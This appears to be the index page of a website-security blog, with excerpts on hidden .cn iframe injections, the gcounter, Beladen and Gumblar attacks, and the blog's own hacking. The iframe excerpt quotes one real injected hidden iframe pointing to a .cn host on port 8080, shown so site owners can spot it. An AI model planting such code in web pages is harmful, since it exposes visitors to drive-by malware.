Happy Birthday Unmask Parasites!
Exactly one year ago I purchased the UnmaskParasites.com domain name and made the first early beta version of my new service available for public testing.
One year later Unmask Parasites is still in beta but now it’s a much more mature service that has proven its viability.
Many interesting things happened during this year. I’m not a good writer to make it an interesting reading, so I’ll only list some milestones, facts and statistics here.
Continue »»
Security Lesson From a Kenyan Marathon Runner
If you have a site/blog but you are not a techie and don’t know much about website security, you might want to read this article written by a Kenyan marathon runner about how his blog was hacked.
He received an email from Google saying that his site had been temporarily removed from search index because it contained hidden spam links and thus violated Google’s guidelines.
Continue »»
Hidden CN Iframes Are Still Prevalent
This post is a reminder that .cn iframe attacks are still among leaders.
The URLs of malicious iframes change over the time. Hackers introduce new suffixes (campaigns?) like : mozila, banner, cocacola, pepsi, add more and more domain names.
Port 8080
Since the pepsi campaign they started using port 8080 in the URLs.
The currently form of the malicious code looks like this
<iframe src="http:// namegamestore .cn:8080/index.php” width=118 height=195 style=”visibility: hidden“></iframe>
It is usually injected at the bottom of index (home) pages.
Continue »»
GStats .cn and GCounter .cn - Malicious Code in .js Files
This must be not a new attack (I’ve found an almost year old article that mentions gcounter iframes) but I started to notice it this past weekend. First, on the Google’s Webmaster Forums, then in the Unmask Parasites logs. So I guess it’s a new wave of the attack.
GCounter .cn
When I first encountered a site infected by gcounter, I checked it with Unmask Parasites. Nothing suspicious was found except for the fact that the domain name was blacklisted by Google. I checked the diagnostic page and found this clue:
Malicious software is hosted on 1 domain(s), including gcounter.cn/.
Beladen - Elusive Web Server Exploit. (information for site owners and hosting providers)
There has not been much buzz about the recent Beladen attack. Although some sources estimated 40,000 infected web sites, it was clearly not as prominent as the Gumblar. To my mind, it’s because of the elusive nature of the Beladen exploit. It is very difficult to detect. It works intermittently. Only a small percentage of site visitors are exposed to malicious content. Many security scanners just overlook it. Most likely the spread of this attack is underestimated.
In this post, I’ll list every fact I know about the Beladen exploit and hope you will add any missing information in the comments. This format proved to be very fruitful in my recent post about the Gumblar exploit where your 150+ comments made my article the most informative online resource about that attack that most other sites (including major media) referred to.
I hope the information you will find here can help site owners and hosting providers understand the nature of the exploit and get rid of it.
Continue »»
Gumblar/Martuz Aftermath
The Gumblar/Martuz epidemic is currently on decline. Comparing with the last week, this week Unmask Parasites registers only a small fraction of Gumblar infected web sites. And I don’t see any new script mutations.
“Martuz .cn” domain no longer resolve and “gumblar .cn” is defunct (the domain is currently parked). This has stopped the surge of new infections. And the increased global awareness helped webmasters identify the problem and get rid of it.
Recovered sites are still blacklisted
Nonetheless, I can still see that many websites recovered from the gumblar/martuz attack are still blacklisted by Google. Their Safe Browsing diagnostic pages say something like:
Continue »»
Security Issues With the Blog
Yesterday, I had been notified that my blog’s web pages sometimes contain malicious scripts. I had to shut down the blog and investigate the issue. Sorry for the inconvenience. I didn’t want to expose you to any threats.
The Unmask Parasites online service was not affected (it is hosted in a different location, and is very secure). It worked all that time. And during the investigation, my blog redirected visitors to http://www.UnmaskParasites.com
Continue »»
A Few More Facts About the Gumblar Attack From SophosLab and ScanSafe.
The Gumblar exploit seems to be the biggest exploit I’ve ever reviewed in my blog. About a thousand visitors come to read my article about Gumblar every day. This exploit accounts for about 80% of positives on Unmask Parasites and I still don’t see any sign of its decline.
I found some more interesting facts about this exploit in SophosLab’s and ScanSafe’s blogs and would like to share them with you.
Continue »»
Blog Moved to VPS
Hi,
To have more things under my control I moved this blog from a shared hosting plan to a VPS (virtual private server).
However, when I imported WordPress posts to the new location, things didn’t go as expected and the structure of threaded comments got broken. When you read popular posts with active discussions, you might not be able to identify who responding to whom. In new posts, threaded comments should be working. Continue »»
Tags: threaded comments VPS WordPress